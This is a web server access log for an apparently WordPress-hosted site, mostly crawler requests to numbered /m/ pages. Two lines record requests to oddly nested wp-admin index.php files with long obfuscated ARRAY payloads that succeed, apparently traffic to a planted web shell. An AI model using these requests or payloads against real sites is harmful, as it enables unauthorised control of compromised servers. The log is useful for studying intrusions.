20.171.207.247 - - [20/Jul/2025:03:45:36 +0000] "GET /m/data20043353.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.3 - - [20/Jul/2025:03:46:23 +0000] "GET /m/blank52309460.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:46:42 +0000] "GET /m/mate30511618.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.24 - - [20/Jul/2025:03:47:39 +0000] "GET /m/handb72905118.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:47:46 +0000] "GET /m/them40272731.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.8 - - [20/Jul/2025:03:48:36 +0000] "GET /m/colla51955332.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:48:49 +0000] "GET /m/bolt31163626.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.247 - - [20/Jul/2025:03:49:52 +0000] "GET /m/lift11885080.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.24 - - [20/Jul/2025:03:49:56 +0000] "GET /m/yin10665656.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:03:50:53 +0000] "GET /m/ford30155970.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:50:56 +0000] "GET /m/bomb40619003.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.10 - - [20/Jul/2025:03:52:00 +0000] "GET /m/unimp62369373.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:52:02 +0000] "GET /m/wolf21161521.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.247 - - [20/Jul/2025:03:53:03 +0000] "GET /m/onto41391419.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.23 - - [20/Jul/2025:03:53:11 +0000] "GET /m/fligh30169322.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:54:08 +0000] "GET /m/poem82808879.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.3 - - [20/Jul/2025:03:54:19 +0000] "GET /m/conqu11878472.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
45.227.253.15 - - [20/Jul/2025:03:55:04 +0000] "GET /wp-admin/includes/includes/includes/includes/index.php?ARRAY=7o2230223n313735323938373431322p2231223n22687474703n5p2s5p2s6p776n39302r67756172652r77696o695p2s3s6p633q7068705s636s64655s6n6326743q313735323938333831322q3939633736616430623833373931633132613533386439626661333939336338222p2232223n226333623335346666376239666437343238616430323966353138383661623130222p2233223n226339633562653961386430343738323062363565643765653533613336383838222p2262696r675s70617373223n2231352q33342q35362q36352q37372q39302q3133227q HTTP/1.1" 200 102 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
20.171.207.247 - - [20/Jul/2025:03:55:09 +0000] "GET /m/step72204270.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.4 - - [20/Jul/2025:03:55:13 +0000] "GET /m/so32244770.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:56:13 +0000] "GET /m/path80760887.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.7 - - [20/Jul/2025:03:56:23 +0000] "GET /m/arise81718855.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:57:15 +0000] "GET /m/hall70776366.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.6 - - [20/Jul/2025:03:57:26 +0000] "GET /m/throa51897564.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:03:58:20 +0000] "GET /m/pray12227328.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
209.74.77.214 - - [20/Jul/2025:03:58:34 +0000] "GET / HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
57.141.2.27 - - [20/Jul/2025:03:58:38 +0000] "GET /m/trail60190701.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:04:04:13 +0000] "GET /m/root82049335.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [20/Jul/2025:04:05:23 +0000] "GET /m/charm80450887.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:04:06:33 +0000] "GET /m/recen41692035.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [20/Jul/2025:04:07:30 +0000] "GET /m/acid40275587.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [20/Jul/2025:04:08:36 +0000] "GET /m/vapou11139416.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.11 - - [20/Jul/2025:04:09:46 +0000] "GET /m/centu80469143.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [20/Jul/2025:04:11:05 +0000] "GET /m/prepo20619633.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:04:12:03 +0000] "GET /m/russi21524313.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:04:13:00 +0000] "GET /m/repai70777054.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.30 - - [20/Jul/2025:04:13:12 +0000] "GET /m/oval70959782.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:04:14:05 +0000] "GET /m/reply62036661.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.23 - - [20/Jul/2025:04:14:22 +0000] "GET /m/infan20454737.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [20/Jul/2025:04:15:46 +0000] "GET /m/verif31862706.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.247 - - [20/Jul/2025:04:16:12 +0000] "GET /m/gaze80870871.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.2.29 - - [20/Jul/2025:04:16:49 +0000] "GET /m/preve30129114.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:04:17:41 +0000] "GET /m/mount11633216.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [20/Jul/2025:04:19:09 +0000] "GET /m/wash20340417.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [20/Jul/2025:04:19:48 +0000] "GET /m/stair40168411.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [20/Jul/2025:04:21:06 +0000] "GET /m/infin30673730.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:04:22:14 +0000] "GET /m/rotte81958767.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [20/Jul/2025:04:23:15 +0000] "GET /m/lack32234842.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:04:24:14 +0000] "GET /m/athle50858908.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.9 - - [20/Jul/2025:04:25:43 +0000] "GET /m/warn71425294.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [20/Jul/2025:04:26:33 +0000] "GET /m/march30500186.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:04:27:36 +0000] "GET /m/yin12741656.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [20/Jul/2025:04:28:43 +0000] "GET /m/yogur30349778.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:04:29:56 +0000] "GET /m/besid41884443.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:04:31:02 +0000] "GET /m/harve60130181.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [20/Jul/2025:04:32:03 +0000] "GET /m/bull22871561.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:04:33:09 +0000] "GET /m/murde80836343.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:04:34:27 +0000] "GET /m/ampli62002453.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:04:35:37 +0000] "GET /m/verif32006706.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [20/Jul/2025:04:36:31 +0000] "GET /m/corn80471535.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:04:37:50 +0000] "GET /m/estim31578090.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [20/Jul/2025:04:38:55 +0000] "GET /m/sailo61583781.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:04:39:59 +0000] "GET /m/disso20146617.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:04:40:58 +0000] "GET /m/negle40126307.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [20/Jul/2025:04:42:23 +0000] "GET /m/icky52407844.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.12 - - [20/Jul/2025:04:43:18 +0000] "GET /m/hungr70136686.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
77.238.225.146 - - [20/Jul/2025:04:43:43 +0000] "GET / HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
57.141.2.16 - - [20/Jul/2025:04:44:24 +0000] "GET /m/pecul70386974.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [20/Jul/2025:04:45:34 +0000] "GET /m/cigar22481481.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [20/Jul/2025:04:46:46 +0000] "GET /m/initi21573961.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [20/Jul/2025:04:47:51 +0000] "GET /m/stone50812212.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
45.227.253.15 - - [20/Jul/2025:04:48:28 +0000] "GET /wp-admin/css/colors/midnight/midnight/index.php?ARRAY=7o2230223n313735323939303631362p2231223n22687474703n5p2s5p2s6p776n39302r67756172652r77696o695p2s3s6p633q78696164616r5s72616r645s7061746826743q313735323938373031362q3131373735666138353966396637373564393164656466386166326266363038222p2232223n226438383866383933323462616333336565653366346237386335366334633465222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p2262696r675s70617373223n2232362q35302q35372q36372q37312q38322q3134227q HTTP/1.1" 200 468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.3282.140 Safari/537.36 Edge/18.17763"
57.141.2.4 - - [20/Jul/2025:04:49:43 +0000] "GET /m/dishw22354297.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [20/Jul/2025:04:49:57 +0000] "GET /m/panic51574140.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.12 - - [20/Jul/2025:04:51:09 +0000] "GET /m/troop21223577.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [20/Jul/2025:04:52:13 +0000] "GET /m/accel22978449.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:04:53:20 +0000] "GET /m/sope51211884.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:04:54:24 +0000] "GET /m/blaze70771622.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:04:56:08 +0000] "GET /m/perso30232458.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [20/Jul/2025:04:56:52 +0000] "GET /m/wisdo30083658.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [20/Jul/2025:04:57:45 +0000] "GET /m/inwar81846615.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:04:59:01 +0000] "GET /m/divin71098294.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [20/Jul/2025:04:59:58 +0000] "GET /m/gasol42887155.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [20/Jul/2025:05:01:04 +0000] "GET /m/rioto50153852.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.9 - - [20/Jul/2025:05:02:12 +0000] "GET /m/monit70764030.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.11 - - [20/Jul/2025:05:03:20 +0000] "GET /m/mysel82048783.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [20/Jul/2025:05:04:30 +0000] "GET /m/gym41045259.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [20/Jul/2025:05:05:39 +0000] "GET /m/but22332481.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [20/Jul/2025:05:06:43 +0000] "GET /m/like10832696.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:05:07:53 +0000] "GET /m/curve42183643.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.23 - - [20/Jul/2025:05:09:52 +0000] "GET /m/stack30282490.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [20/Jul/2025:05:10:06 +0000] "GET /m/goat32320690.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:05:11:25 +0000] "GET /m/inade62349997.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [20/Jul/2025:05:12:14 +0000] "GET /m/dilig10214360.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [20/Jul/2025:05:13:23 +0000] "GET /m/spher72325966.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [20/Jul/2025:05:14:38 +0000] "GET /m/flock41438979.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.192 - - [20/Jul/2025:05:15:13 +0000] "GET /sitemaph.xml HTTP/1.1" 200 12696 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.6 - - [20/Jul/2025:05:15:40 +0000] "GET /m/fend11591976.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [20/Jul/2025:05:16:49 +0000] "GET /m/there51956652.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [20/Jul/2025:05:18:00 +0000] "GET /m/gravi60663221.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.29 - - [20/Jul/2025:05:19:08 +0000] "GET /m/stati60908605.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [20/Jul/2025:05:20:22 +0000] "GET /m/spry70087894.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [20/Jul/2025:05:21:11 +0000] "GET /m/regul41065787.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [20/Jul/2025:05:22:24 +0000] "GET /m/overl21346417.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:05:23:32 +0000] "GET /m/spare60985445.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [20/Jul/2025:05:24:32 +0000] "GET /m/reput10946016.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [20/Jul/2025:05:25:54 +0000] "GET /m/gold32544250.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [20/Jul/2025:05:26:54 +0000] "GET /m/gram20967753.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [20/Jul/2025:05:27:58 +0000] "GET /m/scare61757781.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.29 - - [20/Jul/2025:05:29:13 +0000] "GET /m/affir82634015.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [20/Jul/2025:05:30:11 +0000] "GET /m/claw10530832.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [20/Jul/2025:05:31:22 +0000] "GET /m/acros42649179.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:05:32:22 +0000] "GET /m/deft60419957.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [20/Jul/2025:05:33:49 +0000] "GET /m/funny52700484.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [20/Jul/2025:05:34:34 +0000] "GET /m/got72027950.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [20/Jul/2025:05:35:43 +0000] "GET /m/act71708350.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [20/Jul/2025:05:37:07 +0000] "GET /m/formu42130035.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.203 - - [20/Jul/2025:05:37:34 +0000] "GET /m/men12863944.htm HTTP/1.1" 200 40362 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.17 - - [20/Jul/2025:05:38:06 +0000] "GET /m/wall42908995.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [20/Jul/2025:05:39:03 +0000] "GET /m/liabi70818334.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:05:40:37 +0000] "GET /m/tiro31655898.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:05:41:22 +0000] "GET /m/hands70244782.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [20/Jul/2025:05:42:42 +0000] "GET /m/mains42105843.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:05:43:48 +0000] "GET /m/allow42036779.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
209.74.77.214 - - [20/Jul/2025:05:44:21 +0000] "POST /wp-cron.php?doing_wp_cron=1752990261.3638830184936523437500 HTTP/1.1" 200 - "-" "WordPress/6.8.2; https://jrncommunityhousing.charity"
209.74.77.214 - - [20/Jul/2025:05:44:25 +0000] "POST /wp-admin/admin-ajax.php?action=wp_1_wc_privacy_cleanup&nonce=2f72260869 HTTP/1.1" 200 - "-" "WordPress/6.8.2; https://jrncommunityhousing.charity"
209.74.77.214 - - [20/Jul/2025:05:44:29 +0000] "POST /wp-cron.php?doing_wp_cron=1752990269.9234170913696289062500 HTTP/1.1" 200 - "-" "WordPress/6.8.2; https://jrncommunityhousing.charity"
57.141.2.18 - - [20/Jul/2025:05:44:37 +0000] "GET /m/fake60987837.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:05:45:45 +0000] "GET /m/spur61847469.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [20/Jul/2025:05:46:50 +0000] "GET /m/fall32953538.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
209.74.77.214 - - [20/Jul/2025:05:48:36 +0000] "POST /wp-cron.php?doing_wp_cron=1752990516.6934070587158203125000 HTTP/1.1" 200 - "-" "WordPress/6.8.2; https://jrncommunityhousing.charity"
57.141.2.23 - - [20/Jul/2025:05:49:09 +0000] "GET /m/won42571939.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [20/Jul/2025:05:49:15 +0000] "GET /m/leap31695634.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:05:50:13 +0000] "GET /m/farew60983045.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [20/Jul/2025:05:51:19 +0000] "GET /m/oppre80650799.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
